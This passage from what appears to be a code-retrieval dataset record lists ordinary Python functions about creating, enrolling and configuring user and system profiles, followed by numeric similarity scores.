skill is already linked to profile, return\n if profile_skill.id == skills.id:\n return jsonify(skills.to_dict()), 200\n # if skill is not in profile, append skill and save\n profile.skills.append(skills)\n profile.save()\n return jsonify(skills.to_dict()), 201\n\n # if id not in database, abort\n abort(404)", "def create_ids_profile(**kwargs):\n sessiontoken = kwargs['sessiontoken']\n proxy = kwargs['proxy']\n display_name = kwargs['objectname']\n # stage the necessary JSON payload\n json_data = {\n \"profile_severity\": [\n \"CRITICAL\",\n \"HIGH\",\n \"MEDIUM\",\n \"LOW\"\n ],\n \"criteria\": [],\n \"resource_type\": \"IdsProfile\",\n \"display_name\": display_name,\n \"id\": display_name\n }\n # set value for CVSS severity, if configured by user\n if kwargs['cvss'] is not None:\n cvss = kwargs['cvss']\n cvss_criteria = {\n \"filter_name\": \"CVSS\",\n \"filter_value\": cvss,\n \"resource_type\": \"IdsProfileFilterCriteria\"\n }\n filter_operator = {\n \"operator\": \"AND\",\n \"resource_type\": \"IdsProfileConjunctionOperator\"\n }\n # update 'criteria' key in json payload\n json_data['criteria'].append(cvss_criteria)\n json_data['criteria'].append(filter_operator)\n # set value(s) for products affected, if configured by user\n if kwargs['product_affected'] is not None:\n pa = kwargs['product_affected']\n pa_criteria = {\n \"filter_name\": \"PRODUCT_AFFECTED\",\n \"filter_value\": pa,\n \"resource_type\": \"IdsProfileFilterCriteria\"\n }\n # update 'criteria' key in json payload\n json_data['criteria'].append(pa_criteria)\n response_code = patch_ips_profile_json(proxy, sessiontoken, json_data, display_name)\n if response_code == 200:\n print(f'The IDS Profile {display_name} has been created successfully')\n else:\n print(f'There was an error, please 
check your syntax')\n sys.exit(1)", "def perform_create(self, serializer):\n item = models.ProfileItem.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(profile_item=item)", "def install_single_profile(self, install_single_profile):\n\n self._install_single_profile = install_single_profile", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def add_spawning_profile(intersection, spawning_profile):\n return intersection.add_spawning_profile(spawning_profile)", "def test_user_set_profile():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n r = client.get('/profile')\n with client.session_transaction() as sess:\n data = {\n 'name': 'user',\n 'email': 'user@ctfd.io',\n 'confirm': '',\n 'password': '',\n 'affiliation': 'affiliation_test',\n 'website': 'https://ctfd.io',\n 'country': 'United States of America',\n 'nonce': sess.get('nonce')\n }\n\n r = client.post('/profile', data=data)\n assert r.status_code == 302\n\n user = Teams.query.filter_by(id=2).first()\n assert user.affiliation == 'affiliation_test'\n assert user.website == 'https://ctfd.io'\n assert user.country == 'United States of America'\n destroy_ctfd(app)", "def cli_enable_profile():\n parser = argparse.ArgumentParser(description=cli_enable_profile.__doc__)\n type_select = parser.add_mutually_exclusive_group(required=False)\n type_select.add_argument(\"-i\", \"--iam\", action=\"store_true\", help=\"IAM user type profile\")\n type_select.add_argument(\"-a\", \"--azure\", action=\"store_true\", help=\"Azure login type profile\")\n type_select.add_argument(\"-n\", \"--ndt\", action=\"store_true\", help=\"NDT assume role type profile\")\n if \"_ARGCOMPLETE\" in os.environ:\n parser.add_argument(\"profile\", help=\"The profile to enable\").completer = \\\n ChoicesCompleter(read_profiles())\n argcomplete.autocomplete(parser)\n else:\n parser.add_argument(\"profile\", help=\"The profile to enable\")\n args = parser.parse_args()\n if args.iam:\n profile_type = \"iam\"\n elif args.azure:\n profile_type = \"azure\"\n elif args.ndt:\n profile_type = \"ndt\"\n else:\n profile = get_profile(args.profile)\n if \"azure_tenant_id\" in profile:\n profile_type = \"azure\"\n elif \"ndt_role_arn\" in profile:\n profile_type = \"ndt\"\n else:\n profile_type = \"iam\"\n enable_profile(profile_type, args.profile)", "def assign_profile(name, properties):\n profile_dict = {'time': Time, 'streq': Streq, 'domain': Domain, 'use': Use}\n return profile_dict[name](properties)", "def enroll_certificate(self, kwargs):\n return self.__query(\"certificateEnroll\", kwargs)", "def enroll(cls, user, course_key, mode=\"honor\"):\r\n enrollment = cls.get_or_create_enrollment(user, course_key)\r\n enrollment.update_enrollment(is_active=True, mode=mode)\r\n return enrollment", "def perform_create(self, serializer):\n serializer.save(user_id=self.request.user)\n up = UserProfile.objects.get(user=self.request.user)\n up.greyfish_active = True\n up.save()", "def create_or_update_user_profile(sender, instance, created, **kwargs):\n\n # Create profile and set ACTIVE status to account -- TODO : ACTIVE STATUS\n if created:\n Profile.objects.create(user=instance, status=Status.get_or_create_status(strings.ACTIVE_STATUS))\n\n else:\n instance.profile.save()", "def set_profile_version(context, profile_id, version):\n\n check_profile_id(profile_id)\n ps = 
getToolByName(context, 'portal_setup')\n\n ps.setLastVersionForProfile(profile_id, unicode(version))\n assert(ps.getLastVersionForProfile(profile_id) == (version, ))\n print \"Set version for '%s' to '%s'.\" % (profile_id, version)", "def add_profile(self, request, *args, **kwargs):\n # Todo (mo): utilize self.get_serializer(instance=conversation, data=request.data)\n context = {\n 'conversation': self.get_object(),\n 'request': request\n }\n serializer = AddProfileSerializer(data=request.data, context=context)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_202_ACCEPTED)", "def create_or_update_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.get_or_create(user=instance)\n instance.profile.save()", "def enroll_student(self, student_email):\n # check if course exists\n if not self.is_course_exists():\n print(\"The given course not found\")\n return\n\n if self.is_student_enrolled(student_email):\n print(\"The course is not exists or/ and student {} is already enrolled\".format(student_email))\n return\n else:\n db = self._file.read_db()\n for crs_i in range(len(db[\"courses\"])):\n if db[\"courses\"][crs_i][\"course_name\"] == self._course_name:\n db[\"courses\"][crs_i][\"students\"].append(student_email)\n break\n self._file.write_db(db)\n print(\"The new student is enrolled to course: {}\".format(self._course_name))", "def setprofile(variable, value, account, pair):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n keys = []\n values = []\n if pair:\n for p in pair:\n key, value = p.split(\"=\")\n keys.append(key)\n values.append(value)\n if variable and value:\n keys.append(variable)\n values.append(value)\n\n profile = Profile(keys, values)\n\n if not account:\n account = mph.config[\"default_account\"]\n if not unlock_wallet(stm):\n return\n acc = Account(account, morphene_instance=stm)\n\n json_metadata = Profile(acc[\"json_metadata\"] if acc[\"json_metadata\"] else {})\n json_metadata.update(profile)\n tx = acc.update_account_profile(json_metadata)\n tx = json.dumps(tx, indent=4)\n print(tx)", "def create_profile(sender, **kwargs):\n\n # I import profile here cause i can't import it right in the top.\n from .profiles import Profile\n\n user = kwargs['instance']\n\n Profile.objects.get_or_create(user=user)", "def create_lookalike_audience(self, account_id, name, audience_id,\n lookalike_spec, batch=False):\n path = \"act_%s/customaudiences\" % account_id\n args = {\n 'name': name,\n 'origin_audience_id': audience_id,\n 'lookalike_spec': json.dumps(lookalike_spec),\n }\n return self.make_request(path, 'POST', args, batch)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)", "def on_signup(self, data):\n self.participant_id = data[\"participant\"][\"id\"]", "def make_instructor(course, user_email):\r\n CourseStaffRole(course.id).add_users(User.objects.get(email=user_email))", "def create_custom_audience(self, account_id, name, subtype=None,\n description=None, rule=None, opt_out_link=None,\n retention_days=30, batch=False):\n path = \"act_%s/customaudiences\" % account_id\n args = {\n 'name': name,\n }\n if subtype:\n args['subtype'] = subtype\n if description:\n args['description'] = description\n if rule:\n args['rule'] = json.dumps(rule)\n if opt_out_link:\n args['opt_out_link'] = opt_out_link\n if retention_days:\n args['retention_days'] = retention_days\n return 
self.make_request(path, 'POST', args, batch=batch)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n profile = UserProfile()\n profile.user = instance\n profile.email=instance.email\n profile.save()", "def _add_profile(self, vip, profile_name, bigip, context='all'):\n v = bigip.tm.ltm.virtuals.virtual\n obj = v.load(name=vip[\"name\"], partition=vip[\"partition\"])\n p = obj.profiles_s\n profiles = p.get_collection()\n\n # see if profile exists\n for profile in profiles:\n if profile.name == profile_name:\n return\n\n # not found -- add profile (assumes Common partition)\n p.profiles.create(name=profile_name,\n partition='Common',\n context=context)\n LOG.debug(\"Created profile %s\" % profile_name)", "def create_instructor(self, username):\r\n return self._create_user(username, is_staff=True)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def profile_create(faker_obj=fake_init()):\n profile = faker_obj.simple_profile()\n user = User.objects.create(\n username=profile[\"username\"],\n email=profile[\"mail\"],\n password=profile[\"username\"][::-1],\n )\n return user.id", "def create_user_profile(sender, instance, created, **kwargs):\n\n if created:\n user_profile = UserProfile.objects.create(user=instance)", "def create(\n name: str,\n from_name: str = typer.Option(None, \"--from\", help=\"Copy an existing profile.\"),\n):\n\n profiles = prefect.settings.load_profiles()\n if name in profiles:\n app.console.print(\n textwrap.dedent(\n f\"\"\"\n [red]Profile {name!r} already exists.[/red]\n To create a new profile, remove the existing profile first:\n\n prefect profile delete {name!r}\n \"\"\"\n ).strip()\n )\n raise typer.Exit(1)\n\n if from_name:\n if from_name not in profiles:\n exit_with_error(f\"Profile {from_name!r} not found.\")\n\n # Create a copy of the profile with a new name and add to the collection\n profiles.add_profile(profiles[from_name].copy(update={\"name\": name}))\n else:\n profiles.add_profile(prefect.settings.Profile(name=name, settings={}))\n\n prefect.settings.save_profiles(profiles)\n\n app.console.print(\n textwrap.dedent(\n f\"\"\"\n Created profile with properties:\n name - {name!r}\n from name - {from_name or None}\n\n Use created profile for future, subsequent commands:\n prefect profile use {name!r}\n\n Use created profile temporarily for a single command:\n prefect -p {name!r} config view\n \"\"\"\n )\n )", "def create_speaker(conn, speaker):\n\n sql = ''' INSERT INTO speaker(name,gender,native)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, speaker)\n return cur.lastrowid", "def add_talk(talk):\n # Check if this user is already registered\n exists = check_attendee_exists(talk.userId, talk.profile)\n if not exists[0]:\n return False\n\n talk.put()\n return True", "def begin_trial(self):\n self._post(endpoint='{}/cm/trial/begin'.format(self.api_version))" ]
[ "0.57121813", "0.5669998", "0.55642205", "0.5468942", "0.54388547", "0.5423377", "0.5405765", "0.53824395", "0.5380911", "0.5366512", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.52692974", "0.525241", "0.5236725", "0.5225078", "0.52119666", "0.5204216", "0.52007973", "0.51753956", "0.51603705", "0.51337224", "0.5130088", "0.5123543", "0.5123543", "0.5117897", "0.51121044", "0.50973123", "0.50852376", "0.5073346", "0.5060513", "0.5060513", "0.50574136", "0.5055051", "0.5036927", "0.5032426", "0.50267255", "0.5014151", "0.4993713", "0.49911597", "0.49909627", "0.4972889", "0.49611044", "0.4958676", "0.49556434", "0.49445084", "0.49416524", "0.49344113", "0.490239", "0.48976094", "0.4894072", "0.4893976", "0.48931438", "0.48916373", "0.48827493", "0.48827493", "0.4875042", "0.48737988", "0.48737988", "0.48737988", "0.48686683", "0.4868511", "0.48651016", "0.48617485", "0.48533455", "0.48483136", "0.4848121", "0.48460466", "0.483473", "0.4832703", "0.48136112", "0.4800454", "0.4798535", "0.47802028", "0.477676", "0.4776245", "0.47754008", "0.4757277", "0.4744285", "0.47352207", "0.4731061", "0.47224116", "0.47192314", "0.46932518", "0.4689908", "0.46898186", "0.4682167", "0.46814996", "0.46654874", "0.4662874", "0.46615365", "0.46593606", "0.4658677", "0.4656493", "0.46511608", "0.46452612", "0.46446502" ]
0.72638845
0
Calculates the number of suicides for a type of agent given game mode, observability, and game seed. If the game seed passed is -1, all game seeds are aggregated.
def suicide_query(game_mode=0, observability=-1, game_seed=-1, agent=-1): event_id = "death" # Keep only those games within given configuration if game_seed != -1: selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) & (data['game_seed'] == game_seed)] else: selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)] if agent != -1: for index, row in selection.iterrows(): if agent not in row["agents"]: selection.drop(index, inplace=True) # print(selection.size) team_kill_count = [] ngames = 0 # Number of games in which this agent dies suicides = 0 # Number of games in which this agent commits suicide events_per_sample = [] team_kills = 0 # Iterate through selected game data for index, row in selection.iterrows(): if agent in row["agents"] and row['event_id'] == event_id: # This agent played in the game # Find its agent ID depending on its position in the agent list. There may be more than 1 agent of this # type in the game, so iterate over all and check individually. ll = row["agents"] indices = [i for i, el in enumerate(ll) if el == agent] for agent_id in indices: # teammate = (agent_id + 2) % 4 sample_event_counter = 0 for event in row["event_data"]: if event["agent_id"] == agent_id: # This agent dies if event["killer"] == agent_id: # Suicide sample_event_counter += 1 # if event["killer"] == teammate: # Killed by teammate # team_kills += 1 # if event["agent_id"] == teammate: # Teammate dies # if event["killer"] == agent_id: # Killed by this agent # team_kill_count += 1 ngames += 1 events_per_sample.append(sample_event_counter) suicides += sample_event_counter # suicide_count.append(100*suicides/ngames) # Showing percentage of game suicides # team_kill_count.append(100*team_kills/games) # percentage = 100 * suicides / ngames # mean = ngames * (percentage / 100) # variance = mean * (1 - (percentage / 100)) # std_dev = math.sqrt(variance) # std_err = std_dev / math.sqrt(ngames) # h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95 confidence interval # return percentage, h # print(events_per_sample) mean = suicides/ngames variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample) std_dev = math.sqrt(variance) std_err = std_dev/math.sqrt(len(events_per_sample)) h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95% confidence interval return mean * 100, h * 100 # , team_kill_count
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_agent_number_of_players(players):\n return sum([count_players(player) for player in players\n if player.startswith('agent')])", "def test_winners_per_type_sum(self):\n sim = ss.Simulation()\n sim.run_simulation(14)\n winners = sim.winners_per_type()\n assert sum(winners.values()) == 14", "def get_number_of_agents(model):\n\n n_agents = len(model.schedule.agents_by_type['Customer'])\n return n_agents", "def get_number_of_investors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'Investor'])\n return n_agents", "def get_number_of_cheeses(self):\n number = 0\n for i in range(len(self._stools)):\n number += len(self._stools[i])\n return number", "def culggroup_thickestdonecount(As, Rps, group, dones):\n pairs = sorted(((get_culg_dimension(As, Rps, l), dones[l], l)\n for l in group),\n reverse=True)\n count = len(tuple(itt.takewhile(lambda p: p[1], pairs)))\n return count", "def CountSuits(hand):\r\n numtrump = 0\r\n numss = 0\r\n numos1 = 0\r\n numos2 = 0\r\n\r\n for card in hand:\r\n if card < 7:\r\n numtrump += 1\r\n elif card < 12:\r\n numss += 1\r\n elif card < 18:\r\n numos1 += 1\r\n else:\r\n numos2 += 1\r\n \r\n numsuits = 0\r\n if numtrump != 0:\r\n numsuits += 1\r\n if numss != 0:\r\n numsuits += 1\r\n if numos1 != 0:\r\n numsuits += 1\r\n if numos2 != 0:\r\n numsuits += 1\r\n return [numtrump,numss,numos1,numos2,numsuits]", "def EmpiricalValues(deals):\n global noOfFaceUpCardsPerGame, noOfLegalActionsPerGame\n noOfFaceUpCardsPerGame = []\n noOfLegalActionsPerGame = []\n\n for i in range(deals):\n print(\"\\n\\nDeal %d\" % i)\n newGame = Game()\n firstPlayer = newGame.firstPlayer() # choosing randomly the first player\n\n if firstPlayer == \"player\" :\n dealer = newGame.computer\n else:\n dealer = newGame.player\n\n tableCanBeSwept = newGame.checkIfInitialTableCanBeSwept()\n\n if tableCanBeSwept:\n newGame.sweepTheTable(dealer)\n\n newGame.run(firstPlayer)\n\n noOfFaceUpCardsPerGame.append(newGame.noOfFaceUpCardsPerPlay) # this stores the number of face up cards per play\n noOfLegalActionsPerGame.append(newGame.noOfLegalActionsPerPlay) # this stores the number of legal actions per play\n\n print_stats(deals, noOfFaceUpCardsPerGame, noOfLegalActionsPerGame)", "def sixes(dice):\n return sum([x for x in dice if x == 6])", "def get_suits(hand, board):\n suits = {}\n for card in hand + board:\n if card[1] in suits:\n suits[card[1]] += 1\n else:\n suits[card[1]] = 1\n return suits", "def countModes(self,l_edges):\n\n\t\tassert l_edges is not None\n\n\t\t#Determine the multipole values of each bin in the FFT grid\n\t\tell = self.getEll()\n\n\t\t#Count how many of these pixels fall inside each bin\n\t\tmodes_on = ell[None] < l_edges[:,None,None]\n\t\tmodes_ly_0 = modes_on.copy()\n\t\tmodes_ly_0[:,:,1:] = 0\n\n\t\t#Count the total number of modes, and the number of modes with ly=0 \n\t\tnum_modes = np.diff(modes_on.sum((1,2)).astype(np.float))\n\t\tnum_modes_ly_0 = np.diff(modes_ly_0.sum((1,2)).astype(np.float))\n\n\t\t#Return the corrected number of modes that yields the right variance in the Gaussian case\n\t\treturn num_modes**2/(num_modes+num_modes_ly_0)", "def count_genotypes(genotypeList,StateGenPosData, x, y):\r\n allMos = 0\r\n nonEggs = 0\r\n Adults = 0\r\n for i in range(len(genotypeList)):\r\n gt = genotypeList[i]\r\n b = sum(1 for item in StateGenPosData if not 'new' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y))\r\n c = sum(1 for item in StateGenPosData if 'adult' in 
item[0] and 'XX' in item[1] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y))\r\n d = sum(1 for item in StateGenPosData if 'adult' in item[0] and gt in item[1] and item[2]==(x,y))\r\n## for item in StateGenPosData:\r\n## print(item[0],item[1],item[2])\r\n## if 'adult' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## d+=1\r\n## print('yay')\r\n## if not 'new' in item[0] and not 'egg' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## c+=1\r\n## if not 'new' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## b+=1\r\n allMos = allMos + b\r\n nonEggs = nonEggs + c\r\n Adults = Adults + d\r\n return allMos, nonEggs, Adults", "def get_number_of_char_sponsors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'CharitableSponsor'])\n return n_agents", "def get_agent_count(self, i: int, j: int, dist: str = 'current') -> int:\n return int(self._dist[dist][i, j] / self._param['size_fraction'])", "def op_count(cls, crawler, stage=None):\n if stage:\n total_ops = cls.conn.get(make_key(crawler, stage))\n else:\n total_ops = cls.conn.get(make_key(crawler, \"total_ops\"))\n return unpack_int(total_ops)", "def gal_count(clusters):\n sum = 0\n for x in clusters:\n sum += x.ngal\n return sum", "def agent_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"agent_count\")", "def run_tournament_(genes):\n\n n_genes = len(genes)\n scores = np.zeros(n_genes, dtype=np.uint32)\n for i, j in itertools.combinations(range(n_genes), 2):\n s_i, s_j = run_duel(genes[i], genes[j])\n scores[i] += s_i\n scores[j] += s_j\n continue\n\n return scores / (n_genes - 1)", "def clairvoyant_agent(self, seeds): \n rewards = []\n for seed in seeds:\n self.env.seed(seed)\n self.env.reset()\n\n # store the initial generation levels\n initial_action = [self.env.state.generator_1_level, self.env.state.generator_2_level]\n\n while not self.env.state.is_done():\n # repeat constant action, just in order to get to the end\n self.env.step(initial_action)\n # read realised demand\n realised_demand = np.diagonal(np.array(env.state.agent_predictions_all))\n # optimise the run cost against (clairvoyant) realised demand, pretending to run at t=-1\n min_cost = agent.full_solution([-1] + initial_action + list(realised_demand))\n # collect (negative) cost\n rewards.append(- min_cost)\n return np.mean(rewards)", "def count_sheeps(sheep):\n return sheep.count(True)", "def compute_player_score():\n\n progress_bar = ProgressBar(label=\"Computing universes\")\n\n survivals_count = 0\n for i in range(PARALLEL_UNIVERSES_COUNT):\n if simulate_universe():\n survivals_count += 1\n progress_bar.set_progression((i + 1) / PARALLEL_UNIVERSES_COUNT)\n\n progress_bar.end(\"\\n\\n\")\n\n return survivals_count / PARALLEL_UNIVERSES_COUNT", "def count_gates(qobj, basis, qubits):\n\n #TO DO\n pass", "def hives_count(self) -> int:\n return self.hives.count()", "def choose_target(self, agents):\n\n number_of_suspects = [0]*(len(agents))\n number_of_suspects_per_agent = []\n\n index = 0\n for a1 in agents:\n if not a1.is_impostor():\n for a2 in agents:\n if self.km.suspects(a1.agent_id, a2.agent_id):\n number_of_suspects[index] = number_of_suspects[index] + 1\n else:\n number_of_suspects[index] = 999999\n number_of_suspects_per_agent.append((a1.agent_id,number_of_suspects[index]))\n index = index + 1\n\n self.target = min(number_of_suspects_per_agent, key = lambda t: t[1])[0]", "def 
assess_progress():\n\tconn = pymongo.Connection(MASTER_SERVER)\n\tdb = conn.SocialLearning\n\tdb.authenticate(MONGO_USER, MONGO_PASSWORD)\n\n\tcoll_names = db.collection_names()\n\n\tresult = {}\n\n\tfor m in modes:\n\t\tresult[m[0]] = [0]*MAX_DEMES\n\t\tfor subm in [c for c in coll_names if c.startswith('gp_ '+m[0])]:\n\t\t\tidx = int(subm[4 + len(m[0]):])\n\t\t\tif idx < MAX_DEMES:\n\t\t\t\tcoll = db[subm]\n\t\t\t\tresult[m[0]][idx] = coll.count()\n\n\treturn result", "def winners_per_type(self):\n winners = [winner[1] for winner in self.result]\n # making a list of the type of winners\n return Counter(winners)\n # Using the Counter tool from the standard library to count the\n # types in a dictionary", "def synergy_counter_role(A_side, B_side, A_ban = [], B_ban = []):\n \n #Decide which team\n if len(A_side)%2 == 0 or (len(A_side)%2 == 1 and len(B_side) > len(A_side)):\n team_side = \"A\"\n print(\"AI is on A Side\")\n my_team = A_side\n enemy_team = B_side\n else:\n team_side = \"B\"\n my_team = B_side\n enemy_team = A_side\n print(\"AI is on B Side\")\n \n #Role accounting \n team_roles = {\"Carry\" : 3, \"Captain\" : 1, \"Jungler\" : 1}\n for name in my_team:\n data = [hero for hero in API_rates if hero['name'] == name]\n roles = data[0][\"roles\"]\n for role in roles: \n team_roles[role] -= 1/len(roles)\n print(team_roles)\n\n candidates = []\n #Obtain eligible candidates by roles\n for hero in API_rates:\n if (hero[\"name\"] in A_side) or (hero[\"name\"] in B_side) or (hero[\"name\"] in A_ban) or (hero[\"name\"] in B_ban) :\n pass\n else:\n for role in hero[\"roles\"]:\n if team_roles[role] > 0:\n candidates.append(hero[\"name\"])\n break\n else:\n pass \n \n nominees = get_nominees(candidates, my_team, enemy_team)\n return nominees[0][\"name\"]", "def agentCounter(gameState, index, depth):\n if index == gameState.getNumAgents():\n return [depth-1, 0]\n else:\n return [depth, index]", "def count_choices(self) -> dict:\r\n times_chosen = dict()\r\n\r\n # exclude the optimistic value when counting choices\r\n for arm, values in self.rewards.items():\r\n if self.optim_c not in values:\r\n times_chosen[arm] = len(values)\r\n else:\r\n times_chosen[arm] = 0\r\n\r\n return times_chosen", "def _choose_clusters_num(database_type: str, synthetic_data_dim: int) -> int:\n data_dim: int = 1\n if database_type == DatabaseType.Synthetic:\n data_dim = synthetic_data_dim\n elif database_type in [DatabaseType.ThreeDRoadNetwork, DatabaseType.IndividualHouseholdElectricPowerConsumption]:\n data_dim = 2\n elif database_type == DatabaseType.HouseSalesInKingCounty:\n data_dim = 8\n return 2 * (data_dim + 1) ** 2 + 2", "def get_num_of_states_and_facts(self):\n\n public_predicates = {}\n private_predicates = {}\n sum_of_facts = 0\n\n for domain in self._domains:\n\n problem = list(filter(lambda prob: prob.domain == domain.name, self._problems))[0]\n last_index = problem.name.rfind('-')\n agent_name = problem.name[last_index + 1:]\n\n for predicate in domain.predicates:\n\n predicate_has_private_arg = False\n arg_types = list(map(lambda arg: Agent.get_all_subtypes(arg.type, domain.type_hierarchy),\n predicate.args))\n ordered_objs = []\n\n # go over each arg type (type of first param, second param ...)\n for possible_types in arg_types:\n objs_of_subtype = []\n\n # for each arg add all the types it can be as a list of types\n for type in possible_types:\n if problem.objects.__contains__(type):\n if problem.objects[type][0].private:\n predicate_has_private_arg = True\n objs_of_subtype += 
problem.objects[type]\n\n ordered_objs.append(objs_of_subtype)\n\n param_combinations = list(itertools.product(*ordered_objs))\n\n if (predicate.is_private or predicate_has_private_arg) and predicate.name not in private_predicates:\n private_predicates[predicate.name + '-' + agent_name] = len(param_combinations)\n sum_of_facts += len(param_combinations)\n elif predicate.name not in public_predicates:\n public_predicates[predicate.name] = len(param_combinations)\n sum_of_facts += len(param_combinations)\n\n total_assignments = list(public_predicates.values()) + list(private_predicates.values())\n num_of_states = reduce(lambda a, b: a * b, total_assignments, 1)\n return num_of_states, sum_of_facts", "def count_vario(dist_param, picker_param):\n orig = '/home/zby/MAGISTERKA/MGR/results/oryginal.clustered.t'\n cl_orig = read_clustered(orig)\n name_tag = ''\n ndist = dist_param[1:]\n npick = picker_param[1:]\n for index in drange(5, 20, 0.5):\n name_tag = \"{}_{}_{}\".format(index, npick, ndist)\n try:\n clust2 = read_clustered(tfidf_name('merged.stem{}.stop.clustered.t', name_tag))\n except:\n print(\"no data for {}\".format(name_tag))\n continue\n var, norm = variation_of_information(cl_orig, clust2)\n print(\" {} VOI is {}\".format(name_tag, norm))", "def per_cell_animal_count(self):\n print self.island.individuals()", "def _number_states_in_pclass(n_modes, pclass):\n out = fact(n_modes) / fact(n_modes - len(pclass))\n out /= _compute_mu_factor2(_lengths_groupings(pclass))\n return out.astype(int)", "def get_aggregated_possession_stats_for_entity_type(self, entity_type):\n entity_type = entity_type.lower()\n if entity_type not in ['team', 'opponent', 'player', 'lineup', 'lineupopponent']:\n return None\n if entity_type in ['team', 'opponent']:\n aggregate_stats = {self.HomeTeamId: defaultdict(int), self.VisitorTeamId: defaultdict(int)}\n else:\n aggregate_stats = {self.HomeTeamId: defaultdict(lambda: defaultdict(int)), self.VisitorTeamId: defaultdict(lambda: defaultdict(int))}\n for period in self.Periods:\n for possession in period.Possessions:\n for team_id in possession.PlayerStats.keys():\n for lineup_id in possession.PlayerStats[team_id].keys():\n for opponent_lineup_id in possession.PlayerStats[team_id][lineup_id].keys():\n for player_id in possession.PlayerStats[team_id][lineup_id][opponent_lineup_id].keys():\n for stat_key in possession.PlayerStats[team_id][lineup_id][opponent_lineup_id][player_id].keys():\n stat_value = possession.PlayerStats[team_id][lineup_id][opponent_lineup_id][player_id][stat_key]\n if entity_type == 'team':\n aggregate_stats[team_id][stat_key] += stat_value\n elif entity_type == 'opponent':\n opponent_team_id = utils.swap_team_id_for_game(team_id, [self.HomeTeamId, self.VisitorTeamId])\n aggregate_stats[opponent_team_id][stat_key] += stat_value\n elif entity_type == 'player':\n aggregate_stats[team_id][player_id][stat_key] += stat_value\n elif entity_type == 'lineup':\n aggregate_stats[team_id][lineup_id][stat_key] += stat_value\n elif entity_type == 'lineupopponent':\n opponent_team_id = utils.swap_team_id_for_game(team_id, [self.HomeTeamId, self.VisitorTeamId])\n aggregate_stats[opponent_team_id][opponent_lineup_id][stat_key] += stat_value\n\n # since stat keys are summed up from player stats team and lineup stats will need some stats to be divided by 5\n if entity_type in ['team', 'opponent']:\n for team_id in aggregate_stats.keys():\n for stat_key in aggregate_stats[team_id].keys():\n if stat_key in 
pbpstats.KEYS_OFF_BY_FACTOR_OF_5_WHEN_AGGREGATING_FOR_TEAM_AND_LINEUPS:\n aggregate_stats[team_id][stat_key] = aggregate_stats[team_id][stat_key] / 5\n\n if entity_type in ['lineup', 'lineupopponent']:\n for team_id in aggregate_stats.keys():\n for lineup_id in aggregate_stats[team_id].keys():\n for stat_key in aggregate_stats[team_id][lineup_id].keys():\n if stat_key in pbpstats.KEYS_OFF_BY_FACTOR_OF_5_WHEN_AGGREGATING_FOR_TEAM_AND_LINEUPS:\n aggregate_stats[team_id][lineup_id][stat_key] = aggregate_stats[team_id][lineup_id][stat_key] / 5\n\n return aggregate_stats", "def culggroup_donecount(group, dones):\n return sum(dones[l] for l in group)", "def prepare_count_incidents(self, object):\n roles = object.actorrole_set.all()\n return Incident.objects.filter(actors_role__in=roles).count()", "def N(self):\n return len(self.cavity_grid.cavities) + 1", "def num_species_on_map(self):\n # tot_herbivores = 0\n # tot_carnivores = 0\n # for cells in itertools.chain.from_iterable(self.map):\n # curr_herbivore, curr_carnivore = cells.num_species_per_cell()\n # tot_herbivores += curr_herbivore\n # tot_carnivores += curr_carnivore\n\n return (sum(x) for x in zip(*[cells.num_species_per_cell() for cells in itertools.chain.from_iterable(self.map)]))\n\n # (sum(x) for x in zip(*[cells.num_species_per_cell() for cells in itertools.chain.from_iterable(self.map)]))", "def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn", "def resultCounter(detections):\n counter = 0\n for attribute, value in classIterator(detections):\n if 'crease' in attribute:\n counter += len(value)\n return counter", "def num_injectors(self):\n injectors = self.info_wells.groupby('well_type').get_group('inj')\n return injectors['well'].nunique()", "def get_number_of_atoms_to_optimize(self):\n v = self.c.get(simulation_cell=True)\n return len(v.data.stoichiometry)", "def test_counter_agent(self):\n config = {\n 'name': 'CounterAgent',\n 'network_params': {\n 'path': join(ROOT, 'test.gexf')\n },\n 'agent_type': 'CounterModel',\n 'states': [{'times': 10}, {'times': 20}],\n 'max_time': 2,\n 'num_trials': 1,\n 'environment_params': {\n }\n }\n s = simulation.from_config(config)\n env = s.run_simulation(dry_run=True)[0]\n assert env.get_agent(0)['times', 0] == 11\n assert env.get_agent(0)['times', 1] == 12\n assert env.get_agent(1)['times', 0] == 21\n assert env.get_agent(1)['times', 1] == 22", "def count_players(definition):\n _, player_definition = parse_player_definition(definition)\n return (int(player_definition['left_players']) 